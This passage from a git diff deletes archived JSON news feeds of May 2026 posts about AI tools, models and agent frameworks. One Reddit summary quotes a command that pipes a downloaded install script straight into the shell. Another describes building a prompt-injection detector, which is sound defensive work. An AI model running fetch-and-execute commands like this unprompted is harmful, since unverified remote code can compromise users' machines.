come up as often.", - "category": "ai_tools" - }, - { - "title": "Gmail tie-ins", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tk5of4/gmail_tieins/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-22T02:29:08.000Z", - "summary": "hey folks. I’m looking to setup a way to give a local LLM access to google cloud SDK for Gmail functions. The goal is to be able to have an LLM once daily check a spreadsheet, and based on criteria send an email that will be structured exactly the same way each time, simply as a notification to the client. I have set up GWS through Hermes agent using Gwen3.5 and gone through the whole Oauth 2.0 method. That’s as far as I got tonight before shutting everything down. It gave me some error message in the setup after auth confirmation that I’ll circle back to tomorrow. I’m fairly new to all this obviously. I believe I will need: an excel file that the LLM with access, a .md file listing customer names and emails, and a skill .md file explaining what the email format is and how to decide who to send the email(s) to based on the excel file. I’ve never made a skill before but I’ll do more research on that tomorrow. Am I on the right track here or way off base? Thanks for any input or assistance here.", - "category": "ai_models" - }, - { - "title": "Gergely Neu, an ML researcher at ICREA and Universitat Pompeu Fabra, introduces Value-Driven Transport, a generative modeling framework that integrates optimal control, reinforcement learning, optimal transport, and stochastic primal-dual optimization — Framework evolves samples across five stages via learned value functions.", - "url": "https://www.digg.com/ai/hpkmhl2b?rank=7", - "source": "Digg AI", - "tags": [ - "product_launch", - "developer_tool" - ], - "matching_tags": [ - "product_launch", - "developer_tool" - ], - "importance": 0.94, - "date": "2026-05-22T18:00:11.719Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "I built a music notation app with Claude, and Claude is also a feature inside it", - "url": "https://reddit.com/r/ClaudeAI/comments/1tkp3p4/i_built_a_music_notation_app_with_claude_and/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 0.78, - "date": "2026-05-22T17:05:02.000Z", - "summary": "I've been building Nubium, an open-source music notation editor, with Claude Code. Check out the [README](https://github.com/nth-chile/nubium) to see how I combined Github issues + Claude skills to find a workflow that worked for me. The app is document-driven, which makes it easy for its AI Chat plugin to use the app and edit the score for you. Aside from that, it's a fully-featured editor that's free, runs standalone or in browser, and requires no account. If you happen to be looking for a new notation editor, I'd love any feedback - I made it easy to send feedback in-app. Lmk what you think! Website: [https://nubium.rocks/](https://nubium.rocks/) Repo: [github.com/nth-chile/nubium](http://github.com/nth-chile/nubium)", - "category": "ai_tools" - }, - { - "title": "DeepSeek makes its 75% discount on the DeepSeek-V4-Pro API permanent, keeping rates at one-quarter of prior levels for input and output tokens beyond the prior May 31, 2026 cutoff. — The 1.6-trillion-parameter model offers 1M-token context and fixed per-million pricing.", - "url": "https://www.digg.com/ai/axzmul0l?rank=1", - "source": "Digg AI", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-05-22T18:00:11.698Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "DeepSeek makes its 75% discount on the DeepSeek-V4-Pro API permanent, keeping rates at one-quarter of prior levels for input and output tokens beyond the prior May 31, 2026 cutoff.", - "url": "https://www.digg.com/ai/axzmul0l", - "source": "Digg AI", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-05-22T18:00:11.686Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Most security tools watch what runs in production. Perplexity just released one that scans what's sitting on developer laptops. Bumblebee fills the gap between SBOMs (what shipped) and EDR (what executed). It's a read-only inventory of eve…", - "url": "https://x.com/AlphaSignalAI/status/2057875938180755757", - "source": "X search / AI model updates", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-05-22T17:27:11.000Z", - "summary": "Most security tools watch what runs in production. Perplexity just released one that scans what's sitting on developer laptops. Bumblebee fills the gap between SBOMs (what shipped) and EDR (what executed). It's a read-only inventory of every installed package, extension, and dev", - "category": "ai_models" - }, - { - "title": "Claude + MCP + SVG icons. I wrote a practical guide showing how Claude can use http:// SVGIcons.com as a custom connector to search and retrieve SVG icons directly inside a developer workflow. https:// svgicons.com/articles/svgic ons-claud…", - "url": "https://x.com/svg_icons/status/2057874901252370492", - "source": "X search / Agent workflows", - "tags": [ - "mcp" - ], - "matching_tags": [ - "mcp" - ], - "importance": 1, - "date": "2026-05-22T17:23:04.000Z", - "summary": "Claude + MCP + SVG icons. I wrote a practical guide showing how Claude can use http:// SVGIcons.com as a custom connector to search and retrieve SVG icons directly inside a developer workflow. https:// svgicons.com/articles/svgic ons-claude-custom-connector … #Claude #MCP #AI #WebDev", - "category": "ai_agents" - }, - { - "title": "I built \"zero2claude\", a free course that takes people from zero terminal experience to shipping with Claude Code. The curriculum goes from absolute zero → software basics → Claude Code fundamentals → advanced usage. No shortcuts, no assum…", - "url": "https://x.com/IShmool/status/2057872918348976191", - "source": "X search / AI model updates", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-05-22T17:15:11.000Z", - "summary": "I built \"zero2claude\", a free course that takes people from zero terminal experience to shipping with Claude Code. The curriculum goes from absolute zero → software basics → Claude Code fundamentals → advanced usage. No shortcuts, no assumptions. 17,000+ students. 7", - "category": "ai_models" - }, - { - "title": "trained a prompt injection detector using ml-intern and DeepSeek v4 Flash, runs in the browser", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tkoeuo/trained_a_prompt_injection_detector_using/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-05-22T16:41:10.000Z", - "summary": "Trained a prompt injection classifier using `ml-intern` \\+ DeepSeek v4 Flash. DistilBERT, F1 99%, ONNX int8, \\~65 MB, runs in browser with Transformers.js v3. You can try it here: [https://huggingface.co/spaces/av-codes/prompt-injection-detector](https://huggingface.co/spaces/av-codes/prompt-injection-detector) \\--- I've been interested in prompt injections and agentic security for a while, and wanted to see how a purpose-built ML agent compares to general-purpose coding agents for this kind of task. Here's roughly how it went: `ml-intern` takes an HF token and supports OpenAI-compatible APIs, so I pointed it at OpenRouter (GPU-poor). The agent found existing datasets, [deepset/prompt-injections](https://huggingface.co/datasets/deepset/prompt-injections) and [Shomi28/prompt-injection-dataset](https://huggingface.co/datasets/Shomi28/prompt-injection-dataset), which simplified things since building the dataset is typically 95% of the work in tasks like this. For v1, I went with DistilBERT targeting CPU inference. After a few parameter sweeps, the agent launched a full run and landed at F1 95.87%. I also tried training an HRM-Text model, but the agent didn't figure it out and set up…", - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-23.json b/data/news-feed-2026-05-23.json deleted file mode 100644 index e779057..0000000 --- a/data/news-feed-2026-05-23.json +++ /dev/null @@ -1,251 +0,0 @@ -{ - "generated": "2026-06-05T00:44:42.807Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-23", - "article_count": 15, - "archived_story_count": 332, - "articles": [ - { - "title": "Open-source devtool for AI agent projects [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1tle50x/opensource_devtool_for_ai_agent_projects_p/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "open_source", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "open_source", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-23T11:40:19.000Z", - "summary": "Hi everyone, We are building **AgentLantern**, an open-source devtool for AI agent projects. The idea is simple: as agent-based projects grow, it becomes harder to understand how agents, tasks, tools, and configuration files are connected. **AgentLantern** aims to make these projects easier to document, analyze, validate, and visualize. I started with CrewAI support, but the goal is to progressively extend **AgentLantern** to other agent frameworks. **AgentLantern** currently provides three main features: * **Lantern Docs**: generates browsable documentation from source code and configuration files, without LLM calls or API keys. * **Lantern Lint**: statically checks agent projects to detect design or configuration issues before runtime. * **Lantern Play**: runs the project and opens a pixel-art runtime viewer to observe agents working, delegating, calling tools, and producing outputs. The project is still early, and I’m mainly looking for feedback from people building with AI agents, multi-agent systems, or devtools. here is a demo video showing the execution of a multi-agent system: [3\\_mins\\_Video](https://www.youtube.com/watch?v=Rklr86AiKuk) Docs: [https://brellsanwouo.github.…", - "category": "ai_research" - }, - { - "title": "Apex-Testing: real-world, real repos, agentic coding benchmark (Update)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tlh4vq/apextesting_realworld_real_repos_agentic_coding/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "tool_update", - "agent_tool" - ], - "matching_tags": [ - "tool_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-23T13:54:08.000Z", - "summary": "**BIG Apex-Testing update!** [https://www.apex-testing.org/](https://www.apex-testing.org/) **The Real-World Agentic Coding** benchmark has been (95%) updated with all recent models! This is based on 65-70 **actual private github repos** made especially to test proper agentic coding capabilities of models. **For those who don't know about the project and see it for the first time, here's the excerpt from the website:** \"**What is APEX Testing?** Every week there's a new model that's \"the best ever.\" Every provider promises 10x performance at a fraction of the cost. Benchmarks get cherry-picked, their demos get curated, influencers get paid and people keep falling for it. APEX exists because I got tired of the hype and the intentional benchmaxxing. Models get dropped into real codebases with real bugs and real feature requests, and they have to figure it out like a developer would. 70 tasks across 8 categories, all based on work you'd actually encounter on the job. You get to see what actually works and what's just marketing.\" **What's included currently in metrics:** \\- Avg Cost \\- Avg Time \\- Scoring based off each category/difficulty \\- ELO-based Leaderboard (see details on the…", - "category": "ai_models" - }, - { - "title": "LLaMa.cpp basic question", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tlat5r/llamacpp_basic_question/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-23T08:35:22.000Z", - "summary": "I'm trying to install LLaMa with PI agent. I ran curl -fsSL https://pi.dev/install.sh | sh export PATH=\"/home/user/.local/share/pi-node/node-v22.22.3-linux-x64/bin:$PATH pi install npm:pi-llama.cpp ​ These commands installed pi, added them to path and then I lastly installed an extension that supposedly allows PI agent to connect to my llama models (was that safe or is there a safer way of doing it?). Lastly I ran `yay llama.cpp-vulkan` to install llama.cpp-vulkan.​ Unlike Ollama where I can just get models super easily I have no clue how to get them here. I googled it and asked ChatGPT but I still am so confused. Am I missing something? How do I do it?", - "category": "ai_models" - }, - { - "title": "meituan-longcat/LongCat-Video-Avatar-1.5 · Hugging Face", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tl4wpi/meituanlongcatlongcatvideoavatar15_hugging_face/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-23T03:27:39.000Z", - "summary": "# 🚀 Model Introduction We are excited to announce the release of LongCat-Video-Avatar 1.5, an upgraded open-source framework that prioritizes extreme empirical optimization and production-readiness for audio-driven human video generation. Built upon the LongCat-Video foundation model, v1.5 delivers highly stable, commercial-grade avatar video synthesis supporting native tasks including Audio-Text-to-Video (AT2V), Audio-Text-Image-to-Video (ATI2V), and Video Continuation, with seamless compatibility for both single-stream and multi-stream audio inputs. # [](https://huggingface.co/meituan-longcat/LongCat-Video-Avatar-1.5#key-features)Key Features * 🌟 **Upgraded Audio Encoder (Whisper-Large):**: Replaces Wav2Vec2 with Whisper-Large, yielding significantly smoother and more natural lip dynamics. * 🌟 **Production-Ready Stability**: Achieves accurate lip-synchronization, full-body temporal stability, and robust long-video generation with strict identity consistency. * 🌟 **Stylized Domain Generalization**: Robustly generalizes to anime, animals, and complex real-world conditions such as multi-person interactions and object handling. * 🌟 **Efficient 8-Step Inference**: Advanced DMD2-…", - "category": "ai_models" - }, - { - "title": "IMG Dataset Refiner v4.3 Pro is here! 🚀 The ultimate dataset prep tool for LoRAs", - "url": "https://reddit.com/r/StableDiffusion/comments/1tl36zc/img_dataset_refiner_v43_pro_is_here_the_ultimate/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-05-23T02:09:01.000Z", - "summary": "Hey everyone! A while back I shared v3 of my dataset tool. It was a great visual manager and balancer, but as I said back then: it didn't have auto-captioning. Well, that has completely changed! Welcome to v4.3 Pro. The project has taken a massive leap forward and is now a complete, professional *Data Engineering* suite for your AI model training (Flux, SD3, SDXL, etc.). **What's new?** 🤖 **Full AI Integration:** Local AI (LM Studio/Ollama) & Cloud APIs (Claude, Gemini, OpenAI) to auto-caption, translate, and even hunt down visual hallucinations. 🪄 **Smart AI Recipe Generation:** It automatically analyzes your entire dataset and generates the perfect keyword \"recipe\" (pinning your Trigger Word to the top) for Civitai! 📚 **Mass Batch Editor:** Add, remove, or replace specific tags across a huge selection of images in a single click. 🧹 **Built-in Pre-processing:** Visual duplicate finder, Smart Face Cropping, and mass high-quality resizing. ⚡ **Lightning Fast UI:** Native drag-and-drop for Windows folders, side toggles for a bigger workspace, and real-time translation. It's still the \"recipe book for your LoRAs\", and it's still 100% Open-Source! I've even added 1-click Windo…", - "category": "creative_tools" - }, - { - "title": "got tired of claude code forgetting everything every session, built VIR for it", - "url": "https://reddit.com/r/ClaudeAI/comments/1tlcai2/got_tired_of_claude_code_forgetting_everything/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "cli_tool" - ], - "importance": 0.8600000000000001, - "date": "2026-05-23T10:00:52.000Z", - "summary": "Every session i'm debugging something, figuring out a pattern, making some decision with claude that took us 30 minutes to think through. Then i close the terminal and it's just gone. Next day i'm asking the same questions about the same codebase. I was already tracking stuff manually. CLAUDE.md per project, lessons.md, handoff.md, tasks/ folders. But i'd only write down maybe 5% of what was actually useful. The real reasoning was always still buried in the transcripts. Looked in \\~/.claude/projects one day. 226 jsonl files sitting there. Months of work, none of it being used. So i built vir. It reads your sessions in the background, classifies them (pattern / gotcha / decision / tool), distills the useful stuff into an obsidian vault. Then exposes the vault as an mcp server so claude can query it mid-session, basically giving claude code memory across sessions. You can also query it yourself if you're curious what's in there: \\`\\`\\` vir query \"what gotchas have i hit with auth\" \\`\\`\\` There's stuff in those transcripts you'll never reread manually. Vir surfaces it. Ran it on my own 226 sessions: 126 notes out, 0.91 avg confidence, across 8 projects. Local-first, runs on mac/linux…", - "category": "ai_tools" - }, - { - "title": "Four calls became one: letting the agent author tools mid-session", - "url": "https://reddit.com/r/ClaudeAI/comments/1tl91km/four_calls_became_one_letting_the_agent_author/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "developer_tool" - ], - "matching_tags": [ - "mcp", - "developer_tool" - ], - "importance": 0.7, - "date": "2026-05-23T06:57:08.000Z", - "summary": "MCP in practice is a connector marketplace, not a runtime. You pick servers up front, the agent inherits a fixed catalog, and turn 1 looks the same as turn 200. The session conforms to the toolset. That ordering is backwards. Most non-trivial work surfaces a tool-shaped gap halfway through. The general catalog gets there in five calls. A bespoke wrapper gets there in one and survives into the next session. The question is whether the agent can close that gap without leaving the conversation. Yesterday I was chasing a flaky recipe. Four calls, every time: query traces, grep for the name, sort by timestamp, diff the two most recent failures. The agent noticed on the third repetition and wrote `findFlakyRecipeRuns(name)` into a watched plugin directory — a wrapper around the existing tools that returns the diff directly. Next turn, one call. By the end of the session there were four of these. I wouldn't have specified any of them in advance; all of them match the shape of the work. The literature calls this a self-modifying execution environment. It's been a footnote because five things have to be true together: 1. The agent writes a tool definition. 2. The runtime registers it witho…", - "category": "ai_tools" - }, - { - "title": "Jack Clark announces fictional story with optimistic outlook on humanity's future amid powerful AI systems for next Import AI newsletter — Issue publishes Tuesday; reply questions thematic shift.", - "url": "https://www.digg.com/ai/esmbs3o1?rank=8", - "source": "Digg AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-23T18:00:21.861Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "SemiAnalysis posted data from 174,264 agentic coding sessions showing 42% of runtime on CPU tasks versus 58% on GPU inference and highlighted cloud pricing mismatches with per-token monetization — Median per-turn time measured 5.13 seconds.", - "url": "https://www.digg.com/ai/h7rp9igv?rank=6", - "source": "Digg AI", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-05-23T18:00:21.855Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "What features do you wish ComfyUI or A1111 had?", - "url": "https://reddit.com/r/StableDiffusion/comments/1tllp2t/what_features_do_you_wish_comfyui_or_a1111_had/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-23T16:52:11.000Z", - "summary": "TL;DR: I’m building a local orchestration layer on top of ComfyUI, A1111, and Easy Diffusion that manages workflows, prompt generation, tagging, scoring, and generation history to figure out which models/LoRAs/settings actually produce the best results over time. What next features would you find useful? A little while ago I asked people what features they liked most in their local AI image/video UI setups. Since then I’ve kept building my own local orchestration app around ComfyUI, Easy Diffusion, and Automatic1111, and it has evolved into more of a full workflow layer than I originally planned. I’ll eventually open source it, so I’d love feedback from people who spend a lot of time with local generation tools. The idea is basically this: Instead of using one UI directly for everything, the app sits on top of multiple local backends and manages the overall generation workflow, history, orchestration, and review process. Right now it supports: * launching/stopping backends from inside the app * choosing which backend to use per run * queued multi-run jobs * image + video generation workflows * selecting saved ComfyUI workflows * centralized gallery/history across all runs * per-im…", - "category": "creative_tools" - }, - { - "title": "GitHub - ForgeFlash: A clean, minimal frontend for Stable Diffusion WebUI Forge — inspired by Fooocus's streamlined workflow but with direct access to the controls that actually matter.", - "url": "https://reddit.com/r/StableDiffusion/comments/1tll04p/github_forgeflash_a_clean_minimal_frontend_for/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-05-23T16:25:40.000Z", - "summary": "Hi all. My workflow usually includes quick drafting with Fooocus and/or WebUI before committing to batch generation in ComfyUI, and while I enjoy the streamlined approach of Fooocus, the missing hi-res/upscale etc is a drag. And WebUI sometimes feels a bit too busy for when I just want to 'prompt and go'. So I created this very simple new UI which sits between the two philosophically. You need Forge running, but the UI itself is very streamlined HTML/JS/CSS file leveraging Forge in API mode. The Readme covers all the details and modifying the hard coded parts is quite simple. Just launch forge with API parameters and open the web page in your browser, it will point to [http://127.0.0.1:7860](http://127.0.0.1:7860) by default and get your installed checkpoints etc. PNG metadata stripping also included. Any comments and feedback welcome, as I do have some ideas for further development, but intend to keep it lightweight and easy to approach.", - "category": "creative_tools" - }, - { - "title": "Benchmarked Needle 26M vs Qwen3-0.6B on CPU function calling, 50 queries across 5 difficulty tiers. The 23x smaller model wins on accuracy and is 4.4x faster.", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tljs5o/benchmarked_needle_26m_vs_qwen306b_on_cpu/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-05-23T15:38:34.000Z", - "summary": "Ran a head-to-head on two open-weight models for tool-calling on a 4-core CPU, no GPU, no cherry-picking. Wanted to see if the small specialist (Needle, 26M, distilled from Gemini 3.1 for function calls) actually holds up against a small generalist (Qwen3-0.6B) that also does tools. Setup: 50 queries across 5 tiers (simple, paraphrased, implicit, ambiguous, edge cases including foreign language and a \"don't call any tool\" trap). 5 mock tools. Three metrics per run: parse\\_success, tool\\_match, args\\_match. Same queries, same eval rubric, same hardware. Headline numbers: Needle (26M) Qwen3 (0.6B) tool_match overall 72.0% 56.0% parse_success 84.0% 54.0% args_match | match 97.2% 100.0% mean latency 10.9s 47.9s The interesting part is not the overall win, it's the failure shapes. They diverge completely: * **Needle** fails by picking the wrong tool. When it does pick a tool, args are right 97% of the time. Its sin is selection, mostly routing system commands to search\\_web instead of run\\_command. * **Qwen3** fails by not calling a tool at all. Every single one of its 22 misses is a parse failure where it answered in prose instead of emitting `<tool_call>` tags. When it does emi…", - "category": "ai_models" - }, - { - "title": "GPT 5.5 \"secret sauce\" is just having the thinking be some stupid caveman mode?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tljrtk/gpt_55_secret_sauce_is_just_having_the_thinking/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-23T15:38:11.000Z", - "summary": "I think I had GPT-5.5 leak its trace during a normal conversation, and it really reads like the caveman mode fad from a few months back. Maybe we can achieve better token efficiency by taking some high-quality thinking trace from an open model, \"caveman-izing\" it, and fine-tuning on it. Here is the full log of GPT-5.5 going insane: https://gist.github.com/aussetg/20747ae00df17992acb4ebdfcd8d8d88 EDIT: Ok people I got it the first time", - "category": "ai_models" - }, - { - "title": "My experience using Claude code with Local Llm, and full guide on how to set it up", - "url": "https://reddit.com/r/ClaudeAI/comments/1tlir65/my_experience_using_claude_code_with_local_llm/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-05-23T14:58:46.000Z", - "summary": "Wanted to share a workflow I tested on a real flight, in case anyone else is trying to set up offline Claude Code. The core idea: using ollama to pull the needed model of what you need, and then use it to run claude code The setup, in order: 1. Pull a model on home wifi the night before. \\`ollama pull <model>\\` — \\~9 GB for a 14B, \\~17 GB for a 26B. Don't try this at the gate. 2. In Claude Code, point at Ollama. The cleanest path I found is wrapping it in two aliases: alias claude-local='ollama launch claude --model gemma4:26b' alias claude-cloud='claude' 3. Verify on the ground with wifi physically off. If it works in airplane mode at home, it works at 10 km in the sky. Where I got it wrong: I prepped qwen2.5-coder:14b first because it's the model everyone recommends in local-LLM threads. On the flight, it choked on Claude Code's tool loop; one call took 25 seconds, another took 52. For a workflow that chains five or six tool calls per task, that's unusable. Switched mid-flight to gemma4:26b (which I'd pulled as a backup). Different category of model, RL-trained for tool use, not just code completion. The tool loop ran at a usable speed. The gap analysis I was running on a…", - "category": "ai_tools" - }, - { - "title": "Removing Vision from model", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tlhkts/removing_vision_from_model/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-05-23T14:11:59.000Z", - "summary": "I removed mmproj file from models to remove vision and save my vram. But just curious, is this really don't affect its text ability? I use Qwen 3.6 35b a3b by unsloth and mainly use for agentic coding", - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-24.json b/data/news-feed-2026-05-24.json deleted file mode 100644 index 7c26aec..0000000 --- a/data/news-feed-2026-05-24.json +++ /dev/null @@ -1,269 +0,0 @@ -{ - "generated": "2026-06-05T00:44:43.107Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-24", - "article_count": 15, - "archived_story_count": 365, - "articles": [ - { - "title": "I built a local GUI for the TradingAgents framework — works with Ollama", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tm2ct0/i_built_a_local_gui_for_the_tradingagents/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "developer_tool", - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "open_source", - "developer_tool", - "cli_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-24T04:51:09.000Z", - "summary": "https://preview.redd.it/i90oxxk7n03h1.png?width=1898&format=png&auto=webp&s=7d219c804fda7dfe122b84fcdb6d0d6883818c68 A while back I came across [TradingAgents](https://github.com/TauricResearch/TradingAgents) — a really cool multi-agent LLM stock analysis framework where like a dozen \"agents\" (market analyst, news analyst, bull researcher, bear researcher, risk team, etc.) debate a stock and produce a final trade recommendation. The output is genuinely interesting to read. Problem: it ships as a CLI. You pick options in a terminal, watch logs scroll, then go hunt for markdown files on disk. The reports are good, the experience of getting to them isn't. So I forked it and bolted on a web GUI. Runs locally, talks to whatever LLM provider you have a key for (OpenAI, Anthropic, Google, OpenRouter, DeepSeek, Ollama, xAI, Qwen, GLM, MiniMax). All Apache 2.0. Some things I ended up adding because I wanted them: * Live pipeline visualization showing which agent is working * Reports tab with a 3-pane reader, table-of-contents, search * A \"report length\" knob (Concise / Standard / Comprehensive) — concise mode saves \\~50% tokens * Multi-session chat where you can pin past report…", - "category": "ai_models" - }, - { - "title": "VRAM Suite: early pre-alpha tool for VRAM diagnostics, bounded CUDA probing, and OOM risk estimation", - "url": "https://reddit.com/r/StableDiffusion/comments/1tmixth/vram_suite_early_prealpha_tool_for_vram/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "importance": 0.9400000000000001, - "date": "2026-05-24T17:45:15.000Z", - "summary": "# I started building VRAM Suite — a small framework for VRAM diagnostics in local AI workflows Hi. I wanted to share a small pre-alpha project I started building: \\*\\*VRAM Suite\\*\\*. The basic idea is simple: local AI workflows often fail with CUDA OOM only after everything has already started. I got tired of guessing how much VRAM is actually usable, so I started writing a small Python framework to inspect, record, and later predict VRAM behavior. It is still early, but the current version already has a working foundation. # What works now * CLI command: \\`vramsuite doctor\\` * Public Python API: \\`import vramsuite\\` * Structured doctor API: \\`run\\_doctor()\\` * System/runtime fingerprinting * Optional PyTorch/CUDA detection * NVIDIA GPU memory reading through NVML using \\`ctypes\\` * Driver-level total/free/used VRAM without requiring PyTorch * \\`.vramcard\\` JSON profile format * Rich terminal report output * Optional bounded CUDA allocation probe through PyTorch * Basic OOM risk estimation using \\`--estimate-mb\\` # Example `uv run vramsuite doctor --probe --probe-max-mb 12288 --probe-step-mb 256 --probe-free-floor-mb 2048 --estimate-mb 8000` # Example output summary from my RTX 50…", - "category": "creative_tools" - }, - { - "title": "Claude working autonomously", - "url": "https://reddit.com/r/ClaudeAI/comments/1tm9gm5/claude_working_autonomously/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "mcp", - "developer_tool" - ], - "importance": 0.8600000000000001, - "date": "2026-05-24T11:21:02.000Z", - "summary": "Goodmorning, Has anyone figure out how to configure Claude so that it runs autonomously, almost like Openclaw? I wanted to figure out if it could just autonomously respond to LinkedIn messages and reach out on my behalf? I know i can do this within cowork with mcp servers and tools but didn’t know if managed agents or the SDK would be my best option to try and create this full system", - "category": "ai_tools" - }, - { - "title": "Agent Zero CLI Update Signals Computer Use Polish For Agent Frameworks", - "url": "https://x.com/alessandro_a0/status/2058278886572433812", - "source": "Aligned News (Scoble)", - "tags": [ - "cli_tool", - "agent_tool" - ], - "matching_tags": [ - "cli_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-24T18:23:11.433Z", - "summary": "A current post says A0 CLI v1.11 and Agent Zero v1.17 are live after a Computer Use announcement.", - "category": "ai_tools" - }, - { - "title": "Working on a cgo-free CUDA binding in Go for ML stuff Week 3 - open source [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1tmb4qw/working_on_a_cgofree_cuda_binding_in_go_for_ml/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-05-24T12:41:07.000Z", - "summary": "At our work we use CUDA in Rust since the company switched to it recently. Rust has pretty good Driver API bindings but it made me wonder why the hell we cant have something decent in Go without cgo. I mostly build ML tools in the last month and Go is my main language for pretty much everything. Problem is most Go CUDA projects still need cgo and the full toolkit at build time. That breaks cross compilation and makes Docker images huge which sucks when working on machine learning projects. So last month I started messing around with a proof of concept that loads [libcuda.so](http://libcuda.so) at runtime using purego. No cgo at all. Biggest pain was thread affinity. CUDA keeps context per thread so goroutines switching around kept breaking things. I built a simple executor that locks an OS thread with runtime.LockOSThread and funnels all calls through a channel. Heres roughly what using it looks like right now: func run() error { cuda.Init() dev, _ := cuda.GetDevice(0) ctx, _ := dev.Primary() defer ctx.Close() a, _ := cuda.Alloc[float32](ctx, 1024) b, _ := cuda.Alloc[float32](ctx, 1024) c, _ := cuda.Alloc[float32](ctx, 1024) stream, _ := ctx.NewStream() start, _ := ctx.NewEvent()…", - "category": "ai_research" - }, - { - "title": "PapersWithCode new features - week 1 [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1tmawv5/paperswithcode_new_features_week_1_p/", - "source": "Reddit r/MachineLearning", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-05-24T12:31:12.000Z", - "summary": "Hi, Niels here from the open-source team at Hugging Face. It's been one week since I [launched](https://www.reddit.com/r/MachineLearning/comments/1tgmwqr/reviving_paperswithcode_by_hugging_face_p/) [paperswithcode.co](http://paperswithcode.co), a revival of the website we all loved. It allows us to keep track of the state-of-the-art (SOTA) across various domains of AI, from agents to computer vision and time-series forecasting. The reception has been great, and I'm excited to extend this over the next few months. This week, I've added the following features: \\- Support for multiple metrics for a given benchmark: leaderboards now support multiple metrics, see e.g., the [Open ASR Leaderboard](https://paperswithcode.co/benchmark/open-asr-leaderboard) for automatic speech recognition, which supports both Word Error Rate (WER) and the Inverse Real-Time Factor (RTFx) metrics, or the [Object Detection leaderboard](https://paperswithcode.co/benchmark/coco-val2017), which now also reports frames-per-second (FPS) besides mean average precision (mAP) on COCO. https://preview.redd.it/owlxn0b5u23h1.png?width=2878&format=png&auto=webp&s=1dff2f8feab4f160f77c97ceeb5d90e82382e63c \\- Su…", - "category": "ai_research" - }, - { - "title": "Qwen Plays 